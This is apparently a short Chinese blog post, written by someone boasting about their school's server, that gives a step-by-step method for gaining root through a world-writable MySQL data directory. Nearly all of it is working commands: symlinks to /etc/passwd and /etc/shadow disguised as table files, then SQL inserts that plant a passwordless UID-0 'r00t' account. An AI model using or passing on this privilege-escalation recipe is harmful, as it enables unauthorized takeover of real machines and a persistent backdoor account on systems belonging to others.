通過mysqld獲得root權限
根本不用 '../../tmp'
學校直接把mysql資料夾權限設777
可見我們的admin有多友善
cd /var/tmp
ln -s /etc/passwd a.ISD
ln -s /etc/shadow b.ISD
mysql -u user -h localhost -p******** '../../tmp'
create table a(qqq varchar(255));
create table b(qqq varchar(255));
insert into a values('r00t::0:0:Hacked_Fucked_R00T:/:/bin/sh');
insert into b values('r00t::1:0:99999:7:-1:-1:');
\q
參考資料: http://fanqiang.chinaunix.net/a5/b4/20010521/090400167_b.html
張貼者:嘎嘎嘎嘎嘎 @ 清晨7:45
0 個意見:
張貼留言
訂閱 張貼留言 [Atom]
<< 首頁